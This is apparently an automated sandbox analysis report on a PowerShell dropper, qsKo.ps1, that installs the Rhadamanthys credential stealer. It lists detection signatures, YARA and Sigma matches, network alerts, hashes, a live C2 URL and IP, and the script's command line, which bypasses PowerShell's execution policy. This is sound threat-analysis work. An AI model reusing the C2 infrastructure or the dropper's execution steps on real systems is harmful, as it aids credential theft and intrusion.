Edit tour

Windows Analysis Report
qsKo.ps1

Overview

General Information

Sample name:	qsKo.ps1
Analysis ID:	1511454
MD5:	668884aeb66c4d344622dcd0dc087b8c
SHA1:	0d8a0e61e56313a745a0a7862ecc2fedbf12abbc
SHA256:	01c3e4114427cce7ab6bf90cfa72164a8cfd37dcadddb69817c31679e12fd263
Tags:	APTdeadmunky-nlKimsukyoshi-atps1rhadamanthys
Infos:

Detection

RHADAMANTHYS

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected RHADAMANTHYS Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Powershell drops PE file

Sigma detected: Execution from Suspicious Folder

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: Dllhost Internet Connection

Suricata IDS alerts with low severity for network traffic

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 7316 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qsKo.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

conhost.exe (PID: 736 cmdline: "C:\Windows\system32\conhost.exe" C:\Users\Public\Documents\nUCp.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)

nUCp.exe (PID: 6328 cmdline: C:\Users\Public\Documents\nUCp.exe MD5: FFFAAB9CB76179E7C9CC424C7519F8AB)

OpenWith.exe (PID: 5860 cmdline: "C:\Windows\system32\openwith.exe" MD5: 0ED31792A7FFF811883F80047CBCFC91)

OpenWith.exe (PID: 5952 cmdline: "C:\Windows\system32\openwith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)

setup_wm.exe (PID: 5452 cmdline: "C:\Program Files\Windows Media Player\setup_wm.exe" MD5: F32C225D11A5AF5906CF7C15FDA955E4)

dllhost.exe (PID: 7468 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://0xmrmagnezi.github.io/malware%20analysis/Rhadamanthys/ https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 https://github.com/echocti/ECHO-Reports/blob/main/Malware%20Analysis%20Report/Rhdamanthys/Rhadamanthys-EN.pdf	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Malware Configuration

Threatname: Rhadamanthys

{"C2 url": "https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000003.1419467605.0000000004D19000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000006.00000003.1766148892.0000011F7B611000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000005.00000002.1463969465.0000000004550000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000006.00000003.1511743151.0000011F7B4C4000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000006.00000003.1511532978.0000011F7B411000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000004.00000003.1389217701.0000000000E50000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000005.00000003.1393293145.00000000044F0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000004.00000003.1391976687.0000000004540000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000003.1395128336.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000003.1392146550.0000000004760000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000003.1395438185.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000004.00000003.1393080101.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: powershell.exe PID: 7316	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1f204a:$b1: ::WriteAllBytes( 0x19266:$s1: -join 0x192e9:$s1: -join 0x1940e:$s1: -join 0x196bd:$s1: -join 0x196ef:$s1: -join 0x19737:$s1: -join 0x19764:$s1: -join 0x199d3:$s1: -join 0x19a2f:$s1: -join 0x19a67:$s1: -join 0x19ab6:$s1: -join 0x1a616:$s1: -join 0x1c1a6:$s1: -join 0xb1682:$s1: -join 0xb16bd:$s1: -join 0xb178c:$s1: -join 0xb17ba:$s1: -join 0xb197f:$s1: -join 0xb19a2:$s1: -join 0xb1c69:$s1: -join
Process Memory Space: nUCp.exe PID: 6328	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: OpenWith.exe PID: 5860	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: OpenWith.exe PID: 5952	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 12 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.nUCp.exe.fa0000.0.unpack	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
4.3.nUCp.exe.4760000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
4.3.nUCp.exe.4540000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.3.OpenWith.exe.4db0000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.3.OpenWith.exe.4fd0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Other

Source	Rule	Description	Author	Strings
amsi64_7316.amsi.csv	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x719a2:$b1: ::WriteAllBytes( 0x7ddae:$s1: -join 0x7755a:$s4: += 0x7761c:$s4: += 0x7b843:$s4: += 0x7d960:$s4: += 0x7dc4a:$s4: += 0x7dd90:$s4: += 0x7f529:$s4: += 0x7f5a9:$s4: += 0x7f66f:$s4: += 0x7f6ef:$s4: += 0x7f8c5:$s4: += 0x7f949:$s4: += 0x71a2a:$e4: Start-Process 0x755df:$e4: Get-WmiObject 0x757ce:$e4: Get-Process 0x75826:$e4: Start-Process

Sigma Signatures

System Summary

Sigma detected: Execution from Suspicious Folder

Source: Process started

Author: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Documents\nUCp.exe, CommandLine: C:\Users\Public\Documents\nUCp.exe, CommandLine|base64offset|contains: , Image: C:\Users\Public\Documents\nUCp.exe, NewProcessName: C:\Users\Public\Documents\nUCp.exe, OriginalFileName: C:\Users\Public\Documents\nUCp.exe, ParentCommandLine: "C:\Windows\system32\conhost.exe" C:\Users\Public\Documents\nUCp.exe , ParentImage: C:\Windows\System32\conhost.exe, ParentProcessId: 736, ParentProcessName: conhost.exe, ProcessCommandLine: C:\Users\Public\Documents\nUCp.exe, ProcessId: 6328, ProcessName: nUCp.exe

Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder

Source: File created

Author: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7316, TargetFilename: C:\Users\Public\Documents\nUCp.mp3

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qsKo.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qsKo.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qsKo.ps1", ProcessId: 7316, ProcessName: powershell.exe

Sigma detected: Dllhost Internet Connection

Source: Network Connection

Author: bartblaze: Data: DestinationIp: 194.113.106.180, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 7468, Protocol: tcp, SourceIp: 192.168.2.10, SourceIsIpv6: false, SourcePort: 49708

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qsKo.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qsKo.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\qsKo.ps1", ProcessId: 7316, ProcessName: powershell.exe

Suricata Signatures

ETPRO JA3 HASH Suspected Malware Related Response

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-15T15:02:38.427859+0200	2854824	2	Potentially Bad Traffic	194.113.106.180	3736	192.168.2.10	49706	TCP
2024-09-15T15:02:48.917706+0200	2854824	2	Potentially Bad Traffic	194.113.106.180	3736	192.168.2.10	49707	TCP

ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-15T15:02:25.993182+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	3736	192.168.2.10	49701	TCP
2024-09-15T15:02:38.427859+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	3736	192.168.2.10	49706	TCP
2024-09-15T15:02:48.917706+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	3736	192.168.2.10	49707	TCP
2024-09-15T15:02:55.097704+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49708	TCP
2024-09-15T15:03:01.712920+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49709	TCP
2024-09-15T15:03:08.193359+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49710	TCP
2024-09-15T15:03:14.921005+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49712	TCP
2024-09-15T15:03:21.402407+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49713	TCP
2024-09-15T15:03:28.139413+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49714	TCP
2024-09-15T15:03:34.627622+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49715	TCP
2024-09-15T15:03:41.361518+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49716	TCP
2024-09-15T15:03:47.962486+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49717	TCP
2024-09-15T15:03:54.468063+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49718	TCP
2024-09-15T15:04:01.074588+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49719	TCP
2024-09-15T15:04:07.823659+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49720	TCP
2024-09-15T15:04:14.623754+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49721	TCP
2024-09-15T15:04:20.901754+0200	2854802	1	Domain Observed Used for C2 Detected	194.113.106.180	443	192.168.2.10	49722	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Users\Public\Documents\nUCp.mp3

Avira: detection malicious, Label: TR/Crypt.ZPACK.Gen8

Found malware configuration

Source: 00000004.00000002.1394153462.0000000000FA1000.00000040.00000001.01000000.00000008.sdmp

Malware Configuration Extractor: Rhadamanthys {"C2 url": "https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t"}

Multi AV Scanner detection for domain / URL

Source: deadmunky.nl	Virustotal: Detection: 12%	Perma Link
Source: https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8tkernelbasentdllkernel32GetProcessMitigationPol	Virustotal: Detection: 16%	Perma Link
Source: https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t	Virustotal: Detection: 14%	Perma Link
Source: https://deadmunky.nl:3736/083f339e93162/kuegsocf.6wn8t(	Virustotal: Detection: 16%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Documents\nUCp.exe (copy)	ReversingLabs: Detection: 60%
Source: C:\Users\Public\Documents\nUCp.exe (copy)	Virustotal: Detection: 81%	Perma Link
Source: C:\Users\Public\Documents\nUCp.mp3	ReversingLabs: Detection: 60%
Source: C:\Users\Public\Documents\nUCp.mp3	Virustotal: Detection: 81%	Perma Link

Multi AV Scanner detection for submitted file

Source: qsKo.ps1	ReversingLabs: Detection: 21%
Source: qsKo.ps1	Virustotal: Detection: 19%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Documents\nUCp.mp3

Joe Sandbox ML: detected

Source: C:\Windows\System32\OpenWith.exe

Code function: 6_3_00007DF46E4D2258 CryptUnprotectData,

6_3_00007DF46E4D2258

Source: unknown	HTTPS traffic detected: 104.21.82.103:443 -> 192.168.2.10:49700 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49710 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49717 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49718 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49719 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49720 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49721 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 194.113.106.180:443 -> 192.168.2.10:49722 version: TLS 1.2

Source:	Binary string: softy.pdb source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: *on.pdb> source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1401134083.00000177EE833000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: nUCp.exe, 00000004.00000003.1391779587.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391701123.0000000000E50000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394843323.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394938485.0000000004ED0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: nUCp.exe, 00000004.00000003.1391976687.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1392146550.0000000004760000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1395128336.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1395438185.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: nUCp.exe, 00000004.00000003.1390959056.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391125502.0000000004730000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1393989753.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394224065.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: nUCp.exe, 00000004.00000003.1391365646.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391513023.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394664846.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394483982.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: nUCp.exe, 00000004.00000003.1390959056.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391125502.0000000004730000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1393989753.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394224065.0000000004FA0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: nUCp.exe, 00000004.00000003.1391365646.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391513023.00000000046E0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394664846.0000000004F50000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394483982.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntkrnlmp.pdb4-Xz source: OpenWith.exe, 00000006.00000003.1538253921.0000011F7B75D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ion.pdb^ source: powershell.exe, 00000000.00000002.1402300584.00000177EEAFC000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: OpenWith.exe, 00000006.00000002.1767169425.0000011F79208000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: n.pdb9 source: powershell.exe, 00000000.00000002.1401134083.00000177EE833000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: nUCp.exe, 00000004.00000003.1391779587.00000000045C0000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1391701123.0000000000E50000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394843323.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1394938485.0000000004ED0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: nUCp.exe, 00000004.00000003.1391976687.0000000004540000.00000004.00000001.00020000.00000000.sdmp, nUCp.exe, 00000004.00000003.1392146550.0000000004760000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1395128336.0000000004DB0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 00000005.00000003.1395438185.0000000004FD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: winload_prod.pdb source: OpenWith.exe, 00000006.00000003.1538253921.0000011F7B75D000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\Public\Documents\nUCp.exe

Code function: 4_2_00FFA165 FindFirstFileExW,

4_2_00FFA165

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior

Source: C:\Windows\System32\OpenWith.exe	Code function: 4x nop then dec esp	6_3_00007DF46E4DE261
Source: C:\Windows\System32\OpenWith.exe	Code function: 4x nop then dec esp	6_2_0000011F791B0511
Source: C:\Program Files\Windows Media Player\setup_wm.exe	Code function: 4x nop then dec esp	8_2_0000021CE78E5641

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:3736 -> 192.168.2.10:49701
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:3736 -> 192.168.2.10:49707
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:3736 -> 192.168.2.10:49706
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49710
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49713
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49709
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49712
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49708
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49714
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49721
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49722
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49715
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49719
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49717
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49718
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49716
Source: Network traffic	Suricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 194.113.106.180:443 -> 192.168.2.10:49720

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

